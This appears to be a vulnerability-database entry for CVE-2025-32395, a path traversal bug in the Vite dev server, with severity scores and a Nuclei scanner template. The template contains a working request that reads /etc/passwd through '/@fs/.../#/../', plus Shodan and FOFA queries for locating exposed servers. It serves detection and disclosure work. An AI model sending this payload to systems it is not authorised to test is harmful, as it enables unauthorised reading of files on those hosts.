Vite - Path Traversal
CVE-2025-32395
Verified
Description
Vite versions prior to 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13 contain a file exposure vulnerability caused by improper handling of request URLs that contain '#' when the dev server runs on Node or Bun, letting an attacker read arbitrary files from the host. Exploitation requires the dev server to be exposed to the network and to be running on Node or Bun.
Severity
Medium
CVSS Score
6
Exploit Probability
3%
Published Date
May 2, 2026
Template Author
chrisjr404
CVE-2025-32395.yaml
id: CVE-2025-32395

info:
  name: Vite - Path Traversal
  author: ChrisJr404
  severity: medium
  description: |
    Vite versions prior to 6.2.6, 6.1.5, 6.0.15, 5.4.18, and 4.5.13 contain a file exposure vulnerability caused by improper handling of request URLs that contain '#' when the dev server runs on Node or Bun, letting an attacker read arbitrary files from the host. Exploitation requires the dev server to be exposed to the network and to be running on Node or Bun.
  impact: |
    An unauthenticated attacker who can reach the Vite dev server (commonly exposed during development or in misconfigured deployments) can read arbitrary files on the host filesystem.
  remediation: |
    Update to version 6.2.6, 6.1.5, 6.0.15, 5.4.18, or 4.5.13 or later.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32395
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
    cvss-score: 6.0
    cve-id: CVE-2025-32395
    cwe-id: CWE-200
    epss-score: 0.02848
    epss-percentile: 0.86411
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"/@vite/client"
    fofa-query: body="/@vite/client"
  tags: cve,cve2025,vite,lfi,vuln,unauth

http:
  - raw:
      - |+
        GET /@fs/{{path}}/#/../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    payloads:
      path:
        - "usr/src"
        - "app"
        - "src"
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("root:.*:0:0:", body)'
        condition: and
# digest: 4a0a00473045022060df088fbc0d0fb47ace4cd66f27b7a9cf472705eb387bd59445c83d6fdde55f022100d4d6743106295cd054ca052f3c2788223730c6cc6e09023d31953c84f262b593:922c64590222798bb761d5b6d8e72950